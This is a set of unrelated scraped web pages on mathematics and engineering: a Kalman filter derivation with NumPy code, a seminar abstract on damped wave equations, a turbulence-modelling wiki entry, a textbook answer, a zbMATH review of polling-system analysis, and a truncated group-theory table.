The Kalman Filter can be viewed as a principled way to choose $\mu_x,\, \mu_z,\, \Sigma_{xx},\, \Sigma_{xz},\, \Sigma_{zx},\, \Sigma_{zz}$. There are also other ways to choose these priors, but suppose for now that we have chosen them sensibly. Now that we have a prior $p(x,z)$, we can incorporate any measurement $z_0$ into the state by simply taking the posterior estimate $p(x|z=z_0)$. We will find in the next section that the posterior $x|z=z_0$ is distributed as a Gaussian with the following parameters. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ I will call these equations the Bayes inference equations. ## Deriving the Bayes Inference Equations In this section I'll derive the Bayes inference equations. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ Feel free to come back to this section later if you're willing to take these equations on faith for now. We have the proportionality relationship $p(x|z=z_0) = \frac {p(x, z_0)} {p(z_0)}\propto p(x,z_0)$. This means we only have to evaluate the right-hand side $p(x,z_0)$ in order to know the distribution $p(x|z=z_0)$. Remember the Gaussian density, where $K$ represents a constant of integration that we don't care about. $p(x,z) = K\exp(-\frac{1}{2}\begin{bmatrix} x - \mu_x\\ z - \mu_z\end{bmatrix} ^T\begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1}\begin{bmatrix} x - \mu_x\\ z - \mu_z \end{bmatrix})$ It will be convenient to use the inverse covariance matrix, also known as the information matrix. $\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\equiv \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1}$ We can substitute the information matrix and expand, absorbing the term that depends only on $\mu$ into $K$. $p(x,z) = K\exp(-\frac{1}{2}\begin{bmatrix} x\\ z \end{bmatrix}^T\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\begin{bmatrix} x\\ z \end{bmatrix} + \begin{bmatrix} x\\ z \end{bmatrix}^T \begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\begin{bmatrix} \mu_x\\ \mu_z \end{bmatrix} )$ Then substitute $z = z_0$ and expand more.
We can collect any terms that are not multiplied by $x$ into a constant $C$. $p(x,z_0) = K\exp(-\frac{1}{2}x^T\Lambda_{xx}x - x^T\Lambda_{xz}z_0 + x^T \Lambda_{xx} \mu_x + x^T\Lambda_{xz}\mu_z + C)$ The $C$ and $K$ both drop out as scaling constants. $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x - x^T\Lambda_{xz}z_0 + x^T \Lambda_{xx} \mu_x + x^T\Lambda_{xz}\mu_z)$ $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x + x^T(\Lambda_{xx} \mu_x - \Lambda_{xz}(z_0 - \mu_z)))$ Complete the square by first rewriting $\Lambda_{xx} \mu_x - \Lambda_{xz}(z_0 - \mu_z) \rightarrow \Lambda_{xx} (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z))$ $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x + x^T\Lambda_{xx} (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)))$ $p(x,z_0) \propto \exp(-\frac{1}{2} (x - (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)))^T\Lambda_{xx}(x - (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z))))$ Note that this is the probability density of a Gaussian with mean $\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)$ and covariance $\Lambda_{xx}^{-1}$. $\mu_{x|z=z_0} = \mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} = \Lambda_{xx}^{-1}$ This formula is written in terms of the information matrix, but in many cases it is more convenient to write it in terms of the covariance matrix. To accomplish this, we can use the block-matrix inversion formula, where $\Sigma/\Sigma_{zz}$ is the Schur complement $\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$. $\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix} = \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1} = \begin{bmatrix} (\Sigma/\Sigma_{zz})^{-1} & - (\Sigma/\Sigma_{zz})^{-1}\Sigma_{xz}\Sigma_{zz}^{-1} \\ -\Sigma_{zz}^{-1}\Sigma_{zx}(\Sigma/\Sigma_{zz})^{-1} & \Sigma_{zz}^{-1} + \Sigma_{zz}^{-1}\Sigma_{zx} (\Sigma/\Sigma_{zz})^{-1}\Sigma_{xz}\Sigma_{zz}^{-1}\end{bmatrix}$ We see that $\Lambda_{xx}^{-1} = \Sigma/\Sigma_{zz}$ and $-\Lambda_{xx}^{-1} \Lambda_{xz} = \Sigma_{xz}\Sigma_{zz}^{-1}$. Therefore we can write the distribution of $x|z=z_0$ in terms of the covariance matrix. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ ## Deriving the Kalman Filter In the first section, I mentioned that the Kalman Filter can be seen as a principled way to establish the priors $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$. Remember we wanted these priors so that, given an actual measurement $z_0$, we could apply the Bayes inference equations. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ The Kalman Filter sets up $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$ by supposing that the state variable $x$ and the measurement variable $z$ are both caused by a single prior variable $x_0 \sim N(\mu_{x_0}, \Sigma_{x_0})$, via a state-update matrix $F$ and a measurement matrix $H$. With $w \sim N(0, \Sigma_w)$ as independent process noise, we assume our state $x$ arises from $x_0$ as follows. $x = F x_0 + w$ With $v \sim N(0, \Sigma_v)$ as independent measurement error, we assume our measurement $z$ arises from $x$ (and ultimately from $x_0$) as follows. $z = Hx + v$ These two equations are enough to generate the list $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$ via straightforward computations; the sketch below gives an empirical check.
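As a sanity check of the generative model, the following NumPy sketch (the dimensions and matrices are arbitrary illustrative choices of mine) samples $x_0$, $w$ and $v$, forms $x$ and $z$, and compares the sample covariance of $x$ against the closed form $F\Sigma_{x_0}F^T + \Sigma_w$ derived below:

```python
import numpy as np

rng = np.random.default_rng(1)
F = np.array([[1.0, 0.1], [0.0, 1.0]])   # state-update matrix (illustrative)
H = np.array([[1.0, 0.0]])               # measurement matrix (illustrative)
S0 = np.array([[0.5, 0.1], [0.1, 0.3]])  # Sigma_{x_0}
Sw = 0.05 * np.eye(2)                    # Sigma_w, process-noise covariance
Sv = 0.10 * np.eye(1)                    # Sigma_v, measurement-noise covariance

# Sample the generative model; means are set to zero here so that
# only the covariances need to be compared.
N = 200_000
x0 = rng.multivariate_normal(np.zeros(2), S0, size=N)
w = rng.multivariate_normal(np.zeros(2), Sw, size=N)
v = rng.multivariate_normal(np.zeros(1), Sv, size=N)
x = x0 @ F.T + w   # x = F x0 + w, one sample per row
z = x @ H.T + v    # z = H x + v

print(np.cov(x.T))          # sample covariance of x ...
print(F @ S0 @ F.T + Sw)    # ... approaches F Sigma_{x_0} F^T + Sigma_w
```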
Those computations are carried out in detail in the next section. We will end up with the following. $\mu_x = F\mu_{x_0}$ $\mu_z = HF\mu_{x_0}$ $\Sigma_{xx} =F\Sigma_{x_0}F^T + \Sigma_w$ $\Sigma_{xz} = \Sigma_{xx}H^T$ $\Sigma_{zz} = H\Sigma_{xx}H^T + \Sigma_v$ That's it! Now plug those values into the Bayes update rule and you have a Kalman Filter! $\mu_{x|z=z_0} = F\mu_{x_0}+ \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ A note on terminology for comparison to the Wikipedia article on the Kalman Filter:

• $\mu_x$ is called the predicted mean
• $\Sigma_{xx}$ is called the predicted covariance
• $\Sigma_{zz}$ is called the innovation (or pre-fit residual) covariance
• $\Sigma_{xz} \Sigma_{zz}^{-1} = \Sigma_{xx}H^T\Sigma_{zz}^{-1}$ is called the optimal Kalman gain

## Deriving the Kalman Filter In Detail In this section, I'll show these equalities. $\mu_x = F\mu_{x_0}$ $\mu_z = HF\mu_{x_0}$ $\Sigma_{xx} =F\Sigma_{x_0}F^T + \Sigma_w$ $\Sigma_{xz} = \Sigma_{xx}H^T$ $\Sigma_{zz} = H\Sigma_{xx}H^T + \Sigma_v$ Here are the means. $\mu_x = E[x] =E[Fx_0 + w] = FE[x_0] + E[w] = F\mu_{x_0} + 0 = F\mu_{x_0}$ $\mu_z = E[z] = E[Hx + v] = HE[x] + E[v] = H\mu_x + 0 = HF\mu_{x_0}$ Here are the covariances and cross covariance. It will be convenient to define the delta operator $\Delta$ which means $\Delta y = y - E[y]$. Also, for zero-mean variables like $v, \Delta v = v$. $\Sigma_{xx} = E[\Delta x \Delta x^T]$ $= E[ (F \Delta x_0 + w)(F \Delta x_0 + w)^T]$ $= E[ F \Delta x_0 \Delta x_0^T F^T] + E[ F\Delta x_0 w^T] + E[ w \Delta x_0^T F^T] + E[ w w^T]$ Use independence to distribute expectation in the second and third terms. $= F E[\Delta x_0 \Delta x_0^T] F^T + F E[\Delta x_0]E[ w^T] + E[ w]E[ \Delta x_0^T] F^T + E[ w w^T]$ $=F\Sigma_{x_0}F^T + 0 +0 + \Sigma_w$ $=F\Sigma_{x_0}F^T + \Sigma_w$ $\Sigma_{xz} = E[\Delta x \Delta z^T]$ $= E[\Delta x\,\Delta(Hx + v)^T]$ $= E[\Delta x (H \Delta x + v)^T]$ $= E[\Delta x \Delta x^T]H^T + E[\Delta x ]E[v^T]$ $=\Sigma_{xx} H^T + 0$ $=\Sigma_{xx} H^T$ $\Sigma_{zz} = E[\Delta z\Delta z^T]$ $= E[\Delta (Hx + v)\Delta (Hx + v)^T]$ $= E[(H\Delta x + v)(H\Delta x + v)^T]$ $= HE[\Delta x \Delta x^T]H^T + HE[\Delta x]E[v^T] + E[v]E[\Delta x^T]H^T + E[vv^T]$ $= H\Sigma_{xx} H^T + 0 + 0 + \Sigma_v$ $= H\Sigma_{xx} H^T + \Sigma_v$
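Collecting everything, here is a compact NumPy sketch of one full predict-and-update cycle built directly from the formulas above; the variable names mirror the text, with `Q` and `R` standing in for $\Sigma_w$ and $\Sigma_v$:

```python
import numpy as np

def kalman_step(mu0, P0, F, H, Q, R, z0):
    """One Kalman cycle: priors from (F, H, Q, R), then the Bayes update.

    mu0, P0 : mean and covariance of x_0
    Q, R    : process-noise and measurement-noise covariances
    z0      : the observed measurement
    """
    # Priors implied by x = F x0 + w and z = H x + v
    mu_x = F @ mu0                 # predicted state mean
    Sxx = F @ P0 @ F.T + Q         # predicted state covariance
    mu_z = H @ mu_x                # predicted measurement mean
    Sxz = Sxx @ H.T                # cross-covariance of x and z
    Szz = H @ Sxx @ H.T + R        # innovation covariance

    # Bayes inference equations
    K = Sxz @ np.linalg.inv(Szz)   # optimal Kalman gain
    mu_post = mu_x + K @ (z0 - mu_z)
    P_post = Sxx - K @ Sxz.T       # Sigma_xx - Sigma_xz Sigma_zz^-1 Sigma_zx
    return mu_post, P_post
```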
2022-05-24 19:46:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 119, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9041302800178528, "perplexity": 267.6349334316225}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662573189.78/warc/CC-MAIN-20220524173011-20220524203011-00467.warc.gz"}
https://www.math.kyoto-u.ac.jp/ja/event/seminar/4341
# Scattering and asymptotic order for the wave equations with the scale-invariant damping and mass 2020/06/12 Fri 15:30 - 16:30 In this talk, we consider the linear wave equation with the scale-invariant damping and mass. It is known by Wirth that the solution scatters to the solution of the modified wave equation. Our first aim is to investigate the asymptotic order. We also treat the corresponding equation with the energy critical nonlinearity. Our second aim is to obtain the scattering result and its asymptotic order. This talk is based on joint works [1] and [2] with Professor Haruya Mizutani (Osaka University). References: [1] T. Inui, H. Mizutani, "Scattering and asymptotic order for the wave equations with the scale-invariant damping and mass", preprint, arXiv:2004.03832. [2] T. Inui, H. Mizutani, "Remarks on asymptotic order for the linear wave equation with the scale-invariant damping and mass with $L^r$-data", preprint, arXiv:2005.01335. Note: This seminar will be held as a Zoom online seminar.
2020-07-02 22:33:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5536035895347595, "perplexity": 1177.245493177969}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655880243.25/warc/CC-MAIN-20200702205206-20200702235206-00313.warc.gz"}
https://www.cfd-online.com/W/index.php?title=Explicit_nonlinear_constitutive_relation&diff=cur&oldid=9913
# Explicit nonlinear constitutive relation

## General Concept

An explicit nonlinear constitutive relation for the Reynolds stresses represents an explicitly-postulated expansion over the linear Boussinesq hypothesis.
One such explicit nonlinear expansion of the Boussinesq hypothesis, as proposed by Wallin & Johansson (2000), is given by \begin{align} - \frac{\mathbf{u u}}{k} & + \frac{2}{3} \mathbf{I} = \beta_1 \tilde{\mathbf{S}} \\ & + \beta_2 \left( \tilde{\mathbf{S}}^2 - \frac{II_S}{3} \mathbf{I} \right) + \beta_3 \left( \tilde{\mathbf{\Omega}}^2 - \frac{II_\Omega}{3} \mathbf{I} \right) \\ & + \beta_4 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} - \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \right) + \beta_5 \left( \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} - \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 \right) \\ & + \beta_6 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}} - \frac{2}{3} IV \mathbf{I} \right) \\ & + \beta_7 \left( \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}}^2 - \frac{2}{3} V \mathbf{I} \right) \\ & + \beta_8 \left( \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 + \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \right) + \beta_9 \left( \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}} \tilde{\mathbf{\Omega}} \right) \\ & + \beta_{10} \left( \tilde{\mathbf{\Omega}} \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}}^2 + \tilde{\mathbf{\Omega}}^2 \tilde{\mathbf{S}}^2 \tilde{\mathbf{\Omega}} \right) \end{align} Note that the terms in the first line are exactly the linear relation as expressed by the Boussinesq hypothesis.

## Reference

• Wallin, S., and Johansson, A. V. (2000), "An Explicit Algebraic Reynolds Stress Model for Incompressible and Compressible Turbulent Flows", Journal of Fluid Mechanics, Vol. 403, Jan. 2000, pp. 89–132.
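For readers who want to experiment with such a relation numerically, here is a short NumPy sketch of mine (not from the original wiki page) that evaluates the right-hand side of the expansion. It takes the normalized strain-rate tensor $\tilde{\mathbf{S}}$, rotation-rate tensor $\tilde{\mathbf{\Omega}}$ and the ten $\beta$ coefficients, which must be supplied by the underlying algebraic model; I assume the standard invariant definitions $II_S = \operatorname{tr}\tilde{\mathbf{S}}^2$, $II_\Omega = \operatorname{tr}\tilde{\mathbf{\Omega}}^2$, $IV = \operatorname{tr}\tilde{\mathbf{S}}\tilde{\mathbf{\Omega}}^2$, $V = \operatorname{tr}\tilde{\mathbf{S}}^2\tilde{\mathbf{\Omega}}^2$:

```python
import numpy as np

def nonlinear_expansion(S, O, beta):
    """Right-hand side of the ten-term expansion.

    S, O : normalized strain- and rotation-rate tensors (3x3 arrays)
    beta : sequence of ten coefficients beta_1 .. beta_10
    """
    I = np.eye(3)
    S2, O2 = S @ S, O @ O
    II_S, II_O = np.trace(S2), np.trace(O2)         # invariants (assumed defs)
    IV, V = np.trace(S @ O2), np.trace(S2 @ O2)
    T = [S,
         S2 - II_S / 3 * I,
         O2 - II_O / 3 * I,
         S @ O - O @ S,
         S2 @ O - O @ S2,
         S @ O2 + O2 @ S - 2 / 3 * IV * I,
         S2 @ O2 + O2 @ S2 - 2 / 3 * V * I,
         S @ O @ S2 + S2 @ O @ S,
         O @ S @ O2 + O2 @ S @ O,
         O @ S2 @ O2 + O2 @ S2 @ O]
    return sum(b * t for b, t in zip(beta, T))
```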
2017-06-29 07:41:19
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 3, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.99994957447052, "perplexity": 7693.851871098466}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128323889.3/warc/CC-MAIN-20170629070237-20170629090237-00195.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/algebra-1/chapter-9-quadratic-functions-and-equations-9-1-quadratic-graphs-and-their-properties-practice-and-problem-solving-exercises-page-538/29
## Algebra 1

Published by Prentice Hall

# Chapter 9 - Quadratic Functions and Equations - 9-1 Quadratic Graphs and Their Properties - Practice and Problem-Solving Exercises - Page 538: 29

#### Answer

$(-\infty, \infty)$

#### Work Step by Step

The function in the question is $f(x)=3x^2+6$. First, we find the domain. Since $f$ is a polynomial, it is defined for every real number, so the domain is $(-\infty, \infty)$.
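A quick symbolic confirmation that a polynomial is defined on the whole real line, using SymPy's `continuous_domain` utility (any CAS would do):

```python
import sympy as sp
from sympy.calculus.util import continuous_domain

x = sp.symbols('x')
f = 3 * x**2 + 6
print(continuous_domain(f, x, sp.S.Reals))  # Reals
```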
2019-09-17 00:24:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.46078506112098694, "perplexity": 2065.0461480855924}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514572980.56/warc/CC-MAIN-20190917000820-20190917022820-00302.warc.gz"}
https://zbmath.org/?q=an%3A1137.90434
zbMATH — the first resource for mathematics Mean value analysis for polling systems. (English) Zbl 1137.90434 Summary: The present paper deals with the problem of calculating mean delays in polling systems with either exhaustive or gated service. We develop a mean value analysis (MVA) to compute these delay figures. The merits of MVA are in its intrinsic simplicity and its intuitively appealing derivation. As a consequence, MVA may be applied, both in an exact and approximate manner, to a large variety of models. MSC: 90B22 Queues and service in operations research 60K25 Queueing theory (aspects of probability theory) 62H20 Measures of association (correlation, canonical correlation, etc.) Full Text: References: [1] D. Bertsekas, R. Gallager, Data Networks (Prentice-Hall, New Jersey, 1987). [2] O.J. Boxma, Workloads and waiting times in single-server systems with multiple customer classes (Queueing Systems, 5 (1989) 185–214). · Zbl 0681.60098 [3] R.B. Cooper, G. Murray, Queues served in cyclic order (The Bell System Technical Journal, 48 (1969) 675–689). · Zbl 0169.20804 [4] R.B. Cooper, Queues served in cyclic order: waiting times (The Bell System Technical Journal, 49 (1970) 399–413). · Zbl 0208.22502 [5] M. Eisenberg, Queues with periodic service and changeover time (Operations Research, 20 (2)(1972) 440–451). · Zbl 0245.60073 · doi:10.1287/opre.20.2.440 [6] M.J. Ferguson, Y. Aminetzah, Exact results for nonsymmetric token ring systems (IEEE Transactions on Communications, COM-33 (1985) 223–231). [7] P. Franken, D. Koenig, W. Arndt, F. Schmidt, Queues and Point Processes (John Wiley, New York, 1982). · Zbl 0505.60058 [8] S.W. Fuhrmann, Performance analysis of a class of cyclic schedules (Bell Laboratories Technical Memorandum 81-59531-1, 1981). [9] T. Hirayama, S.J. Hong, M. Krunz, A new approach to analysis of polling systems (Queueing Systems, 48 (1-2)(2004) 135–158). · Zbl 1061.60096 · doi:10.1023/B:QUES.0000039891.78286.dd [10] A.G. Konheim, B. Meister, Waiting lines and times in a system with polling (Journal of the Association for Computing Machinery, 21 (3)(1974) 470–490). · Zbl 0298.68047 [11] A.G. Konheim, H. Levy, M.M. Srinivasan, Descendant set: an efficient approach for the analysis of polling systems (IEEE Transactions on Communications, 42 (2/3/4)(1994) 1245–1253). · doi:10.1109/TCOMM.1994.580233 [12] H. Levy, Delay computation and dynamic behavior of non-symmetric polling systems (Performance Evaluation, 10 (1) (1989) 35–51). · doi:10.1016/0166-5316(89)90004-7 [13] H. Levy, M. Sidi, Polling systems: applications, modeling and optimization (IEEE Transactions on Communications, COM-38 (10)(1990) 1750–1760). · doi:10.1109/26.61446 [14] J.D.C. Little, A proof of the queueing formula L = $$\lambda$$ W (Operations Research, 9 (1961) 383–387). · Zbl 0108.14803 [15] C. Mack, T. Murphy, N.L. Webb, The efficiency of N machines uni-directionally patrolled by one operative when walking time and repair times are constants (Journal of the Royal Statistical Society Series B, 19 (1)(1957) 166–172). · Zbl 0090.35301 [16] C. Mack, The efficiency of N machines uni-directionally patrolled by one operative when walking time is constant and repair times are variable (Journal of the Royal Statistical Society Series B, 19 (1)(1957) 173–178). · Zbl 0090.35302 [17] J.A.C. Resing, Polling systems and multitype branching processes (Queueing Systems, 13 (1993) 409–426). · Zbl 0772.60069 · doi:10.1007/BF01149263 [18] I. Rubin, L.F.M. 
De Moraes, Message delay analysis for polling and token multiple-access schemes for local communication networks (IEEE Journal on Selected Areas in Communications, SAC-l (5)(1983) 935–947). · doi:10.1109/JSAC.1983.1145983 [19] D. Sarkar, W.I. Zangwill, Expected waiting time for nonsymmetric cyclic queueing systems–exact results and applications (Management Science, 35 (1989) 1463–1474). · Zbl 0684.90035 · doi:10.1287/mnsc.35.12.1463 [20] M.M. Srinivasan, H. Levy, A.G. Konheim, The individual station technique for the analysis of polling systems (Naval Research Logistics, 43 (1)(1996) 79–101). · Zbl 0862.60090 · doi:10.1002/(SICI)1520-6750(199602)43:1<79::AID-NAV5>3.0.CO;2-K [21] G.B. Swartz, Polling in a loop system (Journal of the Association for Computing Machinery, 27 (1)(1980) 42–59). · Zbl 0438.94038 [22] H. Takagi, Queueing analysis of polling models: an update (In Stochastic Analysis of Computer and Communication Systems, H. Takagi (ed.), North-Holland, Amsterdam (1990) 267–318). [23] H. Takagi, Queueing analysis of polling models: progress in 1990-1994 (In Frontiers in Queueing: Models, Methods and Problems, J.H. Dshalalow (ed.), CRC Press, Boca Raton (1997) 119–146). · Zbl 0871.60077 [24] H. Takagi, Analysis and application of polling models (In Performance Evaluation: Origins and Directions, G. Haring, C. Lindemann and M. Reiser (eds.), Lecture Notes in Computer Science, vol. 1769, Springer, Berlin (2000) 423–442). [25] R.W. Wolff, Poisson arrivals see time averages (Operations Research, 30 (2) (1982) 223–231). · Zbl 0489.60096 · doi:10.1287/opre.30.2.223 This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
2021-04-12 16:44:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4272236227989197, "perplexity": 11583.990504159243}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038067870.12/warc/CC-MAIN-20210412144351-20210412174351-00296.warc.gz"}
https://people.maths.bris.ac.uk/~matyd/GroupNames/217/Dic3.D10.html
Copied to clipboard ## G = Dic3.D10order 240 = 24·3·5 ### 6th non-split extension by Dic3 of D10 acting via D10/D5=C2 Series: Derived Chief Lower central Upper central Derived series C1 — C30 — Dic3.D10 Chief series C1 — C5 — C15 — C30 — C3×Dic5 — S3×Dic5 — Dic3.D10 Lower central C15 — C30 — Dic3.D10 Upper central C1 — C2 — C22 Generators and relations for Dic3.D10 G = < a,b,c,d | a6=c10=1, b2=d2=a3, bab-1=cac-1=dad-1=a-1, cbc-1=dbd-1=a3b, dcd-1=c-1 > Subgroups: 336 in 80 conjugacy classes, 32 normal (all characteristic) C1, C2, C2 [×3], C3, C4 [×4], C22, C22 [×2], C5, S3 [×2], C6, C6, C2×C4 [×3], D4 [×3], Q8, D5, C10, C10 [×2], Dic3, Dic3, C12 [×2], D6, D6, C2×C6, C15, C4○D4, Dic5 [×2], Dic5, C20, D10, C2×C10, C2×C10, Dic6, C4×S3 [×2], D12, C3⋊D4, C3⋊D4, C2×C12, C5×S3, D15, C30, C30, Dic10, C4×D5, C2×Dic5, C2×Dic5, C5⋊D4 [×2], C5×D4, C4○D12, C5×Dic3, C3×Dic5 [×2], Dic15, S3×C10, D30, C2×C30, D42D5, S3×Dic5, D30.C2, C5⋊D12, C15⋊Q8, C6×Dic5, C5×C3⋊D4, C157D4, Dic3.D10 Quotients: C1, C2 [×7], C22 [×7], S3, C23, D5, D6 [×3], C4○D4, D10 [×3], 